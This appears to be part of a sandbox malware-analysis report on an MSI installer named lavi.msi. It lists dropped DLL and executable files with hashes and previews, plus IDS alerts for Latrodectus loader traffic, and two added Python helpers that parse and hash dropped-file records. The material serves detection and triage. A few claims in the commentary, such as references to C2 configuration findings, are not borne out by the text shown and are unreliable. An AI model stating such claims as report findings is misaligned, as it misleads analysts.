...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...;...?...5...6...7...8...9...:.......=.......>.......@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):446944
                                                                                                                                                          Entropy (8bit):6.403916470886214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: Document-v09-42-38.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-v05-53-20.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-19-06-38.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-19-06-38.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-14-33-26.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: net.msi, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-14-33-26.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: 1156#U91d1#U5c71#U6bd2#U9738#U79bb#U7ebf#U5b89#U88c5#U5305.msi, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-19-36-27.js, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                          Further dropped copies: the same DLL (446944 bytes, MD5 475D20C0EA477A35660E3F67ECF0A1DF, SHA1 67340739F51E1134AE8F0FFC5AE9DD710E8E3A08, SHA-256 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD) is recorded three more times as dropped by C:\Windows\System32\msiexec.exe; each of those records is identical to the one above (PE32 DLL, Entropy 6.403916470886214, Encrypted:false, Malicious:false, ReversingLabs detection 0%).
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):400992
                                                                                                                                                          Entropy (8bit):6.59159515749273
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:6MvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1P:6MvZx0FlS68zBQSncb4ZPQTpAjZxqO1P
                                                                                                                                                          MD5:9A4B8A32A74A2B76C73AA21A4911D47A
                                                                                                                                                          SHA1:8FCD2EA10021B0AE2E837335001F87AC63F161CC
                                                                                                                                                          SHA-256:2069DD0CC6A0CB9240597DB508E5E856200D861729A63259B65E18C931ECA950
                                                                                                                                                          SHA-512:F99B18E7A88CF500BA2511D96693EB29F4CAF7A941BEFB9C3B3CCC05BBFE302E74A5685697AF86574BEE7CD3043D23A88589F1EE891ADC0B4CE54E9DB674090B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:...@IXOS.@.....@i'mY.@.....@.....@.....@.....@.....@......&.{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}..HtmControl..lavi.msi.@.....@a....@.....@........&.{288EF131-2483-44D2-A86F-48308EA76F57}.....@.....@.....@.....@.......@.....@.....@.......@......HtmControl......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}6.C:\Users\user\AppData\Roaming\COSACA LTD\HtmControl\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}*.01:\Software\COSACA LTD\HtmControl\Version.@.......@.....@.....@......&.{EFB833C5-471A-4841-A27D-3C9DBD3209A2}+.C:\Users\user\AppData\Roaming\apptext.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".6.C:\Users\user\AppData\Roaming\COSACA LTD\HtmControl\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@...... .C:\Us
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):399328
                                                                                                                                                          Entropy (8bit):6.589290025452677
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                                          MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                          SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                                          SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                                          SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................
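Two things in the records above are worth handling with a script rather than by eye: the same 446944-byte DLL (SHA-256 426E6CF1...) is listed once per drop location with identical fields, and the 400992-byte file typed only as "data" carries the "@IXOS" signature of a Windows Installer execution script, whose preview already exposes the installer's actions (CreateFolders, InstallFiles) and the drop path C:\Users\user\AppData\Roaming\apptext.dll. The following triage helper is an added example, not code from the Joe Sandbox report or from Joe Security: it parses this section's Key:Value layout (splitting each line at the first colon so Windows paths survive, starting a new record at every "Process:" line), collapses records by SHA-256, labels each unique file from its preview bytes, and recomputes the two values a practitioner re-checks against a local copy of an artefact, the 8-bit Shannon entropy that the "Entropy (8bit)" field reports and the MD5/SHA1/SHA-256 digests in the report's upper-case notation. The SAMPLE_RECORDS excerpt is constructed here from values copied out of the records above (with the DLL record deliberately repeated), the 7.2 entropy threshold is a common rule of thumb for packed or encrypted content and not a report field, the IXOS classification is a magic-byte heuristic, and all function names are this example's own.

```python
# Added triage helper for Joe Sandbox 'Dropped Files' records (not report code).
import hashlib
import math
from collections import OrderedDict

# Constructed excerpt: field values copied from the records above; the
# 446944-byte DLL is listed twice to show how records for one file collapse.
SAMPLE_RECORDS = r"""
Process:C:\Windows\System32\msiexec.exe
Size (bytes):446944
Entropy (8bit):6.403916470886214
MD5:475D20C0EA477A35660E3F67ECF0A1DF
SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
Malicious:false
Preview:MZ......................@...
Process:C:\Windows\System32\msiexec.exe
Size (bytes):446944
Entropy (8bit):6.403916470886214
MD5:475D20C0EA477A35660E3F67ECF0A1DF
SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
Malicious:false
Preview:MZ......................@...
Process:C:\Windows\System32\msiexec.exe
Size (bytes):400992
Entropy (8bit):6.59159515749273
MD5:9A4B8A32A74A2B76C73AA21A4911D47A
SHA-256:2069DD0CC6A0CB9240597DB508E5E856200D861729A63259B65E18C931ECA950
Malicious:false
Preview:...@IXOS.@.....@i'mY.@.....
Process:C:\Windows\System32\msiexec.exe
Size (bytes):399328
Entropy (8bit):6.589290025452677
MD5:B9545ED17695A32FACE8C3408A6A3553
SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
Malicious:true
Preview:MZ......................@...
"""

PACKED_ENTROPY_HINT = 7.2  # rule-of-thumb packed/encrypted threshold (assumption, not a report field)

def parse_records(text):
    """One dict per record; a record starts at each 'Process:' line.
    Lines split at the first colon so 'C:\\...' paths survive intact."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("•"):   # skip blanks and per-vendor bullet lines
            continue
        key, sep, value = line.partition(":")
        if key == "Process":
            current = {}
            records.append(current)
        if sep and current is not None:
            current[key] = value.strip()
    return records

def classify_preview(preview):
    """Magic check on the report's Preview column (heuristic: leading bytes only)."""
    if preview.startswith("MZ"):
        return "PE image (MZ header)"
    if "@IXOS" in preview[:16]:
        return "Windows Installer script (IXOS)"
    return "unknown"

def shannon_entropy(data):
    """Bits per byte, the same quantity as the report's 'Entropy (8bit)' field."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def digests(data):
    """Upper-case hex digests in the report's notation, for comparing a local copy."""
    return {"MD5": hashlib.md5(data).hexdigest().upper(),
            "SHA1": hashlib.sha1(data).hexdigest().upper(),
            "SHA-256": hashlib.sha256(data).hexdigest().upper()}

def triage(text):
    """Collapse records by SHA-256: one summary row per unique file, first-seen order."""
    groups = OrderedDict()
    for rec in parse_records(text):
        sha = rec.get("SHA-256", "")
        g = groups.setdefault(sha, {
            "sha256": sha, "count": 0, "malicious": False, "processes": set(),
            "size": int(rec.get("Size (bytes)", "0")),
            "entropy": float(rec.get("Entropy (8bit)", "0")),
            "kind": classify_preview(rec.get("Preview", "")),
        })
        g["count"] += 1
        g["malicious"] |= rec.get("Malicious", "").lower() == "true"
        g["processes"].add(rec.get("Process", ""))
        g["packed_hint"] = g["entropy"] >= PACKED_ENTROPY_HINT
    return list(groups.values())

if __name__ == "__main__":
    for row in triage(SAMPLE_RECORDS):
        print(f"{row['sha256'][:12]}.. x{row['count']} {row['size']:>7} B  "
              f"H={row['entropy']:.2f}  malicious={row['malicious']}  {row['kind']}")
```

Run against the full section text, the grouping turns the four identical DLL records into one row with count 4, and none of the dropped files crosses the entropy hint, which agrees with the report: these are plain, unpacked PE images and installer data, so a sandbox verdict of Malicious:true alongside a ReversingLabs detection of 0% (as for the 399328-byte executable above) is a behavioural call, not a static one, and the recomputed digests are what to match when the same file turns up on a host.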

Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.1610705500378629
Encrypted:false
SSDEEP:12:JSbX72FjdAGiLIlHVRpzh/7777777777777777777777777vDHFmTu5Rp01l0i8Q:JnQI53Yu5s8F
MD5:434F1256BD3A1512E8F777D06D423E06
SHA1:480B214D329682582A7A7732B4683B71653ADB6B
SHA-256:04393CD51A1910F172DE0DF47EB55E2B3C82D9259EF312559EB7CE3864481BB2
SHA-512:BB1A7A934FDB62CFBF1BE0CD668E968F8E89E6C2563EC55142A28040A336FC29FE2B5AE2B7FFFF3C277529F67062C8528372645000D127F208B0125C2480EB1A
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.5343237055833994
Encrypted:false
SSDEEP:48:G8PhFuRc06WXOCFT5vIUPsHSgJAEkCyGG2HSgtTK8K:ZhF1UFT2UkH5KvCVfH54
MD5:379ABC7BAEE1E9B17C178DFE27D302EC
SHA1:A38D32CA99C4E82F3A194FFF6FBEB9693F8D454B
SHA-256:AC918A4D4842416AEB47FA24324F392DAB042B57D72FDBE74863C2456A913218
SHA-512:912C2BA531C9173E321957B894A4FAC5423B69C82F0798AF19923948BBF99E1797CB208E33DEE8B7FF7F6F5716BC995762FEF74A7791ED3B3BD625BAA47197FC
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\msiexec.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):360001
Entropy (8bit):5.36298284158752
Encrypted:false
SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau0:zTtbmkExhMJCIpEZ
MD5:CFFF49353FCC764E37C57C3BECC3C7D3
SHA1:06CF69EF44C5584B686304B5BABFD6C4D9F62DA2
SHA-256:83BA488E797397764AE030A5ABCA47EB7EB0279E3590F7122551D5603C5B72E8
SHA-512:A8A242EFA1F401AFD3E4758571E73470D97E1B4B311C113ADB4D6E0A104214397E133C1A75045094FDDF225B4D5AB8DCA34D3B3251B9CA6E9D267E692457AB31
Malicious:false
Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):32768
Entropy (8bit):1.2321256188792842
Encrypted:false
SSDEEP:48:XC9u2PvcFXOTT5LhIUPsHSgJAEkCyGG2HSgtTK8K:y94OTUUkH5KvCVfH54
MD5:D7C01E8F3B42D4F934B20538280A4DF6
SHA1:D5082C83336245DA4A54F6AD60A8A7EE2D31494A
SHA-256:478EA91C1CB1D5C3B0E0C1733CC069A3B1F72BBD2E021CC2B185BDB0B031022B
SHA-512:9F63860407818B65B86E947F843BBF38AFD2BEB2705845D36DF124914985CD3CF6035EAF1E1DB24C647D2FCC980159E233445A85A82BF0CDCC70C32ED8AE705E
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.5343237055833994
Encrypted:false
SSDEEP:48:G8PhFuRc06WXOCFT5vIUPsHSgJAEkCyGG2HSgtTK8K:ZhF1UFT2UkH5KvCVfH54
MD5:379ABC7BAEE1E9B17C178DFE27D302EC
SHA1:A38D32CA99C4E82F3A194FFF6FBEB9693F8D454B
SHA-256:AC918A4D4842416AEB47FA24324F392DAB042B57D72FDBE74863C2456A913218
SHA-512:912C2BA531C9173E321957B894A4FAC5423B69C82F0798AF19923948BBF99E1797CB208E33DEE8B7FF7F6F5716BC995762FEF74A7791ED3B3BD625BAA47197FC
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
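As an added triage example (written for this page; it is not part of the Joe Sandbox report or of the sample under analysis): the script below recomputes the fields shown in each dropped-file entry above, the four hashes in the report's upper-case hex form, the 8-bit Shannon entropy, a magic-byte file type limited to the types that occur in this listing (MZ executable, OLE compound document, UTF-8 text with BOM, otherwise "data"), and a dotted printable preview. All inputs are constructed in the block: a 512-byte all-zero blob, which is what a 512-byte "data" entry with entropy 0.0 contains, and small stand-ins for the other magic values. The helper `matches_listed` is an assumption of this example, not a report feature; it lets an analyst confirm that a local copy of a dropped file is the one the report lists by comparing SHA-256 values.

```python
import hashlib
import math
from collections import Counter

# Constructed sample inputs, not files taken from the report. "zero512" is a
# 512-byte all-zero blob, i.e. the content of the report's 512-byte "data"
# entries (entropy 0.0); the other three are minimal stand-ins that carry the
# magic bytes of the remaining file types seen in the listing.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
SAMPLES = {
    "zero512": b"\x00" * 512,
    "pe_stub": b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 60,
    "ole_stub": OLE_MAGIC + b"\x00" * 504,
    "utf8_bom_text": "\ufeffTo learn about increasing the verbosity of the NGen log files\r\n".encode("utf-8"),
}


def hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA-256/SHA-512 in the upper-case hex form the report uses."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for one repeated value, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_type(data: bytes) -> str:
    """Magic-byte classification restricted to the types present in the listing."""
    if data[:2] == b"MZ":
        return "MZ executable"
    if data[:8] == OLE_MAGIC:
        return "Composite Document File V2 Document"
    if data[:3] == b"\xEF\xBB\xBF":
        return "Unicode text, UTF-8 (with BOM)"
    return "data"


def preview(data: bytes, width: int = 64) -> str:
    """Printable-ASCII preview with every non-printable byte shown as '.', like the report."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:width])


def triage(data: bytes) -> dict:
    """One record per file with the same fields the report prints per dropped file."""
    return {"size": len(data), "entropy": round(entropy(data), 6),
            "type": file_type(data), "preview": preview(data), **hashes(data)}


def matches_listed(data: bytes, listed_sha256: str) -> bool:
    """Hypothetical helper: does a local copy match the SHA-256 the report lists?"""
    return hashes(data)["sha256"] == listed_sha256.upper()


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        row = triage(blob)
        print(f"{name}: type={row['type']!r} size={row['size']} "
              f"entropy={row['entropy']} sha256={row['sha256']}")
```

Two practical points follow from running this against the listing. First, the 512-byte zero blob reproduces the MD5 and SHA-256 the report shows for its 512-byte "data" entries, so those entries are inert placeholders rather than payload; a SHA-256 match against a known-benign value is a faster exclusion than reading previews. Second, the opposite does not hold: the MZ entry above is marked Malicious:true with a 0% ReversingLabs detection, so a clean static scan of a dropped executable is not evidence of benignity, and the behavioural verdicts elsewhere in the report (process injection, C2 configuration) are what should drive the decision.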

Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.5343237055833994
Encrypted:false
SSDEEP:48:G8PhFuRc06WXOCFT5vIUPsHSgJAEkCyGG2HSgtTK8K:ZhF1UFT2UkH5KvCVfH54
MD5:379ABC7BAEE1E9B17C178DFE27D302EC
SHA1:A38D32CA99C4E82F3A194FFF6FBEB9693F8D454B
SHA-256:AC918A4D4842416AEB47FA24324F392DAB042B57D72FDBE74863C2456A913218
SHA-512:912C2BA531C9173E321957B894A4FAC5423B69C82F0798AF19923948BBF99E1797CB208E33DEE8B7FF7F6F5716BC995762FEF74A7791ED3B3BD625BAA47197FC
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):32768
Entropy (8bit):1.2321256188792842
Encrypted:false
SSDEEP:48:XC9u2PvcFXOTT5LhIUPsHSgJAEkCyGG2HSgtTK8K:y94OTUUkH5KvCVfH54
MD5:D7C01E8F3B42D4F934B20538280A4DF6
SHA1:D5082C83336245DA4A54F6AD60A8A7EE2D31494A
SHA-256:478EA91C1CB1D5C3B0E0C1733CC069A3B1F72BBD2E021CC2B185BDB0B031022B
SHA-512:9F63860407818B65B86E947F843BBF38AFD2BEB2705845D36DF124914985CD3CF6035EAF1E1DB24C647D2FCC980159E233445A85A82BF0CDCC70C32ED8AE705E
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.0680023241589871
Encrypted:false
SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOmTuKIdEoVky6l0t/:2F0i8n0itFzDHFmTu5o01
MD5:4FB58FE1D5CC331A5D874D0F396E8B0F
SHA1:FD23F6E7DA165E585D60185ABB95179BD349EFA4
SHA-256:8D8B81F85995EE111CE0BA925E4E1653B355DBD900B61BB513D761FF393BD9C8
SHA-512:252ED694BC4861DFC13C16B0F40EDCA0EE7F4FB1644C05106980AC24B11D39E344AA8E47CB96609F8E3E2AD9A8A347530CEAA41EA367C902CA3A1F62173CCBD6
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false

Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):32768
Entropy (8bit):1.2321256188792842
Encrypted:false
SSDEEP:48:XC9u2PvcFXOTT5LhIUPsHSgJAEkCyGG2HSgtTK8K:y94OTUUkH5KvCVfH54
MD5:D7C01E8F3B42D4F934B20538280A4DF6
SHA1:D5082C83336245DA4A54F6AD60A8A7EE2D31494A
SHA-256:478EA91C1CB1D5C3B0E0C1733CC069A3B1F72BBD2E021CC2B185BDB0B031022B
SHA-512:9F63860407818B65B86E947F843BBF38AFD2BEB2705845D36DF124914985CD3CF6035EAF1E1DB24C647D2FCC980159E233445A85A82BF0CDCC70C32ED8AE705E
Malicious:false

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):73728
Entropy (8bit):0.1263065537968079
Encrypted:false
SSDEEP:24:VKppoTxbApHipVbAppbApHipVbApJAEVbyjCyEpGVPwG+do+hTz:VK3oTEHSgMHSgJAEkCyGGqoUv
MD5:9F97714CD663BA87530D8B53D9B4FB10
SHA1:DA891E0F657B7824F8FE7C341BAE291E1AA2E9DD
SHA-256:0E60058AEA8B4DC6D0BE4ED63B9ACA7EF6B58DF0045A5C07CB8984170F82A277
SHA-512:ECEF2DD3A535D1EDFE2E06A7EA4637F90CC91D944B1D75F806BD38C63D2801BD77A64BF3A418AE2BED3F535A50581F359E9DEC76EEE024A02347FCC6618766D6
Malicious:false

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false

File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {288EF131-2483-44D2-A86F-48308EA76F57}, Number of Words: 10, Subject: HtmControl, Author: COSACA LTD, Name of Creating Application: HtmControl, Template: ;1033, Comments: This installer database contains the logic and data required to install HtmControl., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Entropy (8bit):7.438024782173503
TrID:
• Windows SDK Setup Transform Script (63028/2) 47.91%
• Microsoft Windows Installer (60509/1) 46.00%
• Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:lavi.msi
File size:2'131'456 bytes
MD5:c65899e2519f4ad21fb4b97f0a113362
SHA1:a1f854c29a69c19949499fca5e24b02b97be46fd
SHA256:025abbec1724b9180b369fe116da9d90ae47a4996f6a4e28e8a947bac1e0c741
SHA512:eca93cb24187735ec54d4b4e99675f87f1957e255f59c5432498bbc2c47c77b6ccfdf48861a2f78eb377307ce8f6e6458eaf4b766b96e6c2faea1fb87e3dcbb4
SSDEEP:49152:/c53YhW8zBQSc0ZnSKBZKumZr7Aej3YOXT7wYyr8lCV:QYY0Zn3K/Ai33XXZ0
TLSH:44A5F12233C6C537C9AE01307A1AD66B557DFCA74B3140D7A3C82A2EAE745C06639F97
Icon Hash:2d2e3797b32b2b99

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-13T10:59:33.580098+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-13T11:00:14.462381+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.8 | 58082 | TCP
2024-11-13T11:02:03.714625+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58086 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:03.752840+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58086 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:07.268279+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58087 | 172.67.191.232 | 443 | TCP
